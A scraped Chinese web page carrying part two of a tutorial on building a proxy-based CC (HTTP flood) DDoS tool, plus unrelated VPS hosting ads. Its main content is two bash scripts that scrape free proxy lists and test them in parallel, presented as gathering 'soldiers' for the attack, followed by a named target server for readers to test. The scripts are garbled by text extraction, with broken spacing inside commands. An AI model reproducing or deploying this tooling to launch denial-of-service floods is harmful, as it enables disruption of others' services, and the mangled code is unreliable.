代理DDoS攻防战（二）：CC攻击工具实现与防御理论 _118

ddos攻击工具时间:2021-01-09 阅读:()

我们将要实现一个进行应用层DDoS攻击的工具综合考虑 CC攻击方式是最佳选择并用bash shell脚本来快速实现并验证这一工具并在最后讨论如何防御来自应用层的DDoS攻击。

第一步获取大量可用代理ip:port列表

网上所处可见免费代理我们使用http的GET方法抓取html文档接着使用正则过滤出我们需要的ip port对然后逐一验证各代理的可用性最终得到可用的代理ip port对。

1 grab_proxy.sh

2 #!/bin/bash

4 #get proxy l ist

5 declare proxyListFi le="proxy.txt"

6 declaretmpFi le=`mktemp`

7 declareurl

8 declarel ine

9 declaretimes

10 declareip

11 declare port

12 declare i

13 declarej

14 declare mod

16 function quit() {

17 rm-f$tmpFi le

18 exit "$1"

19}

21 echo"get proxy l ist. . .please wait. .."

23 if[ -r "$proxyListFi le" ]

24then

25 rm-f$proxyListFi le

26 fi

28 touch$proxyListFi le

30 forurl in " http://www.youdai l i .cn/Dai l i/guonei/2215.html "\

32 " http://www.youdai l i .cn/Dai l i/guonei/2215_3.html"\

33 " http://www.youdai l i .cn/Dai l i/guonei/2215_4.html "

34 do

35 if GET"$url">$tmpFi le

36 then

37 grep-oE '^.*<br/>.*$' "$tmpFi le" |grep-Eo"([0-9]+) (\. [0-9]+){3}:([0-9]+)"\

38 | sort -n | uniq | awk-F: '{printf("%-15s%s\n",$1,$2); }'>>$proxyListFi le

39 else

40 exec1>&2

41 echo"error:get proxyl istfai l ! chechthe url :$urlorthe network"

42 quit1

43 fi

44 done

46 echo"done. total `cat$proxyListFi le |wc-l`proxy"

48 quit0

49#exit

参数declare proxyListFile=” proxy. txt” ?#抓取到的代理ip port对所存放的文件路径

1 check_proxy.sh

2 #!/bin/bash

4 #get proxy l ist

5 declarecheck_threads=10

6 declarel ine

7 declaretimes

8 declareip

9 declare port

10 declare i

11 declarej

12 declare mod

14 function quit() {

15 exit "$1"

16}

18#echo"start check proxy'sfunctional ity. . ."

20#retargetthe inputfi leto stdin

21 if[ "$#" -gt "0" ]

22then

23 exec0<$1

24 else

25 exec1>&2

26 echo"usage:bash$0 proxyListFi le.txt"

27 echo"error:musthaveone inputarg"

28 quit1

29 fi

31#check proxy'sfunctional ity

32times=0

33whi lereadl ine

34 do

35 times=$((times+1) )

36 j=0

37 for i in`echo$l ine | tr ' ' '\n' |grep-E'^[^\s].*$'`38 do

39 j=$((j+1) )

40 if[ "$j" -eq1 ]

41 then

42 ip=$i

43 else

44 port=$i

45 fi

46 done

47 #echo"times=$timesip=$ip port=$port"

48 #start test

49 if GET-t 5-p"http://$ip:$port" "http://baidu.com"&>/dev/nul l

50 then

51 echo"$ip$port"

52 echo":) ip=$ip port=$port "&>/dev/nul l

53 else

54 echo"inval id ip=$ip port=$port :please check ip:host or network"&>/proc/self/fd/2

55 fi&

56 mod=$((times%check_threads) )

57 if [ "$mod" -eq"0" ]

58 then

59 wait

60 fi

61 done

63#closethefdof inputfi le

64 exec 0>&-

65 quit0

66#exit

参数declare check_threads=10#验证代理可用性时的并发数看一下代码就会发现我们使用的是GET?http://baidu.com方法所以并发数请不要也太高: )除非你的目标就是……

总结应征入伍的士兵共计600人经过考核的共计449人如果你还想招募更多的士兵奉劝一句苦海无边 回头是岸。

第二步吹响战争号角

笔者在一台VPS上建立了一个薄弱的靶机各位读者请不要太暴力测试一下就可以了地址?http://eecs.cc:8080/

展开全文

代理DDoS攻防战（二）：CC攻击工具实现与防御理论 _118相关文档

第五届江苏技能状元大赛

攻击服务(ddos)攻击工具基本技术原理及其发展]

攻击[管理]分布式拒绝服务(DDoS)攻击工具基本技术原理

攻击DDOS攻击四大工具剖析及防范方法

ddos攻击工具什么是DDOS攻击工具。和僵尸网络(botnet).

TNAHosting（$5/月）4核/12GB/500GB/15TB/芝加哥机房

TNAHosting是一家成立于2012年的国外主机商，提供VPS主机及独立服务器租用等业务，其中VPS主机基于OpenVZ和KVM架构，数据中心在美国芝加哥机房。目前，商家在LET推出芝加哥机房大硬盘高配VPS套餐，再次刷新了价格底线，基于OpenVZ架构，12GB内存，500GB大硬盘，支持月付仅5美元起。下面列出这款VPS主机配置信息。CPU：4 cores内存：12GB硬盘：500GB月流...

EdgeNat 新年开通优惠 - 韩国独立服务器原生IP地址CN2线路七折优惠

EdgeNat 商家在之前也有分享过几次活动，主要提供香港和韩国的VPS主机，分别在沙田和首尔LG机房，服务器均为自营硬件，电信CN2线路，移动联通BGP直连，其中VPS主机基于KVM架构，宿主机采用四路E5处理器、raid10+BBU固态硬盘！最高可以提供500Gbps DDoS防御。这次开年活动中有提供七折优惠的韩国独立服务器，原生IP地址CN2线路。第一、优惠券活动EdgeNat优惠码（限月...

腾讯云2核4GB内存8M带宽年74元

一般大厂都是通过首年才有可以享受爆款活动，然后吸引我们注册他们商家达到持续续费和购买的目的。一般只有大厂才能有这样的魄力和能力首年亏本，但是对于一般的公司和个人厂家确实难过，这几年确实看到不少的同类商家难以生存。这里我们可以看到有对应的套餐方案。不过这两个套餐都是100%CPU独享的，不是有某云商家限制CPU的。但是轻量服务器有个不好的就是带宽是较大且流量是限制的额，分别是1GB和1.2TB月流量...

代理DDoS攻防战（二）：CC攻击工具实现与防御理论 _118

TNAHosting（$5/月）4核/12GB/500GB/15TB/芝加哥机房

EdgeNat 新年开通优惠 - 韩国独立服务器原生IP地址CN2线路七折优惠

腾讯云2核4GB内存8M带宽 年74元

腾讯云2核4GB内存8M带宽年74元